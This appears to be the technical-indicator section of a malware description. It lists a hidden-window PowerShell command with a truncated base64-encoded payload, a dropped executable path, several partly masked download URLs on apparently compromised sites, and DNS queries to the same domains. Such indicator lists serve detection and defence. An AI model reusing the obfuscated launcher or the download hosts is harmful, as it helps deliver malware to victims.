Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABOAHcAegB1AHoAYgBuAGoAPQAnAEQAegBzAHgAZwB6AGIAbQBsAGQAdAAnADsAJABPAHIAdQBrAG8AYgBwAGMAcgBhAHkAIAA9ACAAJwA4ADcAMgAnADsAJABBAHYAdQBwAHQAdwBlAHQAagB4AD0AJwBYAHk...
- %HOMEPATH%\872.exe
- http://ds####neroots.com/wp-content/cb72253/
- http://ww###lper.com/comm/moneymakers/css/m53/
- http://www.qu####ms.technology/wp-content/uploads/60d0crm2/
- http://www.qu####ms.technology/
- DNS ASK ds####neroots.com
- DNS ASK ok###atest.com
- DNS ASK ww###lper.com
- DNS ASK st###.aca-apac.com
- DNS ASK qu####ms.technology